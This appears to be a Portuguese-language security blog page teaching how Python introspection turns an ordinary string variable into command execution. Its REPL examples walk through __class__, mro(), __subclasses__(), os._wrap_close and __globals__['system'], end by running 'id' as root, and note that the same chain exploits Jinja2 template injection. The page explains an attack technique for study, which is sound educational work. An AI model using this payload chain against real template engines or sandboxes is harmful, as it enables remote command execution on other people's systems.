<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Var to RCE</title>
    <style>
        body {
            font-family: monospace;
            color: rgb(255, 255, 255);
            background: black;
            line-height: 1.5;
        }

        h1 {
            font-size: 40px;
        }

        p {
            font-size: 18px;
            color: rgb(255, 255, 255);
        }

        p.subtitle {
            font-size: 12px;
            color: rgb(66, 165, 79);
        }
        p.topic {
            font-size: 32px;
            color: rgb(255, 255, 255);
        }
        p.Subtopic {
            font-size: 20px;
            color: rgb(255, 255, 255);
        }
        pre {
            font-family: monospace;
            white-space: pre-wrap;
            line-height: 125%;
            background-color: #1a191a;
            padding: 1em;
        }

        .image-container img {
            width: 100%;
            height: auto;
        }

        .image-container {
            max-width: 30%;
            display: block;
            margin-left: auto;
            margin-right: auto;
        }

        @media (max-width: 480px) {
            .image-container img {
                width: 300px;
                max-width: none;
            }
            .image-container {
                text-align: left; 
                margin-left: 0; 
                margin-right: auto; 
            }
        }
        
        .gif-container img {
            width: 100%;
            height: auto;
        }
        .gif-container {
            max-width: 40%;
            display: block;
            margin-left: auto;
            margin-right: auto;
        }
        @media (max-width: 480px) {
            .gif-container img {
                width: 380px;
                max-width: none;
            }
            .gif-container {
                text-align: left; 
                margin-left: 0; 
                margin-right: auto;
            }
        }
        .highlight {
            background-color: rgb(195, 232, 180);
            padding: 0.2em 0.5em;
            border-radius: 4px;
        }

        .green-text {
            color: rgb(66, 165, 79);
        }
    </style>
</head>

<body>
    <h1>RCE por meio de variável em Python</h1>
    <p class="subtitle">Don't stop hacking</p>
    <p>Diferente do PHP, no Python, uma variável (seja string, float ou int) é um objeto, o que significa que essa variável possui funções Built-in (que já vêm no core do Python). Um exemplo disso é o <strong>replace</strong>:    </p>
    <div class="codehilite">
        <pre><code>
└─# python3
Python 3.11.4 (main, Jun  7 2023, 10:13:09) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> variavel = 'Gutierreox8o'
>>> variavel.replace('o','0')
'Gutierre0x80'
>>> 
    </code></pre>
    </div>
    <p>O replace é uma função que existe dentro do nosso objeto string (Variavel nome).</p>
    <p>Podemos ver o tipo de classe que a varíavel pertence usando o <strong>__class__</strong> É importante deixar claro que isso não é o tipo da variável, e sim a classe que ela pertence.</p>
    <div class="codehilite">
        <pre><code>
    &#62;&#62;&#62; variavel.__class__
    &lt;class 'str'&gt;
    &#62;&#62;&#62;
        </code></pre>
    </div>
    <p>A "variavel" são duas coisas. A String e o objeto.</p>
    <p>Usando a função <strong>mro()</strong> (Method Resolution Order), podemos acessar individualmente cada um desses objetos:</p>
    <div class="codehilite">
        <pre><code>
&gt;&gt;&gt; variavel.__class__.mro()
[&lt;class &#39;str&#39;&gt;, &lt;class &#39;object&#39;&gt;]
&gt;&gt;&gt; variavel.__class__.mro()[1]
&lt;class &#39;object&#39;&gt;
&gt;&gt;&gt;

        </code></pre>
    </div>
    <p>Passei o valor <strong>[1]</strong> para acessar a classe objeto, pois começamos a contar partindo do 0. Se houvesse mais uma classe, teríamos que adaptar e escolher 2, por exemplo.</p>
    <p>Agora que acessamos a classe objeto, vamos acessar todas as subclasses que existem dentro usando o <strong>__subclasses__()</strong>:</p>
    <div class="codehilite">
        <pre><code>
 &gt;&gt;&gt; variavel.__class__.mro()[1].__subclasses__()
[&lt;class &#39;type&#39;&gt;, &lt;class &#39;async_generator&#39;&gt;, &lt;class &#39;bytearray_iterator&#39;&gt;, &lt;class &#39;bytearray&#39;&gt;, &lt;class &#39;bytes_iterator&#39;&gt;, &lt;class &#39;bytes&#39;&gt;, &lt;class...
&gt;&gt;&gt;
        </code></pre>        
    </div>
    <p>Todas essas são as subclasses que existem dentro da nossa string. É interessante copiar no VS Code e separar em linhas diferentes, em breve entenderá o motivo.</p>
    <div class="image-container">
    <img src="/Itens/organiza.png" alt="VsCode">
    </div>
    <p>No cenário perfeito, podemos procurar alguma subclasse que tenha acesso a alguma função dentro da biblioteca os:    </p>
    <div class="image-container">
        <img src="/Itens/wrap_close.png" alt="Descrição da imagem">
    </div>
    <p>Então, se de alguma forma, conseguirmos entrar dentro da função wrap_close e dentro dessa função voltarmos para a raiz da biblioteca (que é o os) e chamarmos a função system, conseguiríamos executar comandos no sistema:</p>
    <p>Para entrarmos na função wrap_close, é bem simples. Como isso está em um array(), começamos a contar partindo do zero, então nesse caso, vamos utilizar o valor 140 para a subclasse os._wrap.close:    </p>
    <div class="codehilite">
        <pre><code>
&gt;&gt;&gt; variavel.__class__.mro()[1].__subclasses__()[140]
&lt;class &#39;os._wrap_close&#39;&gt;
&gt;&gt;&gt;     
        </code></pre>
    </div>
    <p>O atributo <strong><span class="green-text">__class__</span></strong> retorna o objeto de classe associado à variável nome. A <strong><span class="green-text">mro()</span></strong> é usada para acessarmos individualmente a string e o objeto da variável. A
        notação <strong><span class="green-text">[1]</span></strong> indica a posição do objeto (0,1). Você pode usar <strong><span class="green-text">.__subclasses__()</span></strong>
        para acessar as subclasses, e <strong><span class="green-text">[140]</span></strong> para acessar a função 140, que neste caso, é equivalente ao
        <strong><span class="green-text">os._wrap_close</span></strong>.</p>
    <p>A função <strong><span class="green-text">.__init__</span></strong> é usada para voltar para a função construct da os, e
        <strong><span class="green-text">.__globals__</span></strong> é usada para exibir todas as variáveis e bibliotecas existentes na biblioteca.</p>
    <p>Agora vamos chamar a função <strong>system</strong> do módulo os e executar algum comando.</p>
    <div class="codehilite">
        <pre><code>
&gt;&gt;&gt; variavel.__class__.mro()[1].__subclasses__()[140].__init__.__globals__[&#39;system&#39;](&#39;id&#39;)
uid=0(root) gid=0(root) groups=0(root)
0
        </code></pre>
    <p>Isso é utilizado para explora SSTI em Jinja2, a lógica é exatamente a mesma, óbviamente, existem algumas diferenças e nem sempre a os._wrap.close vai estar disponível, mas usando essa lógica, você pode acessar outra subclasse que importe a OS.
    </p>
    </div>
</body>

</html>
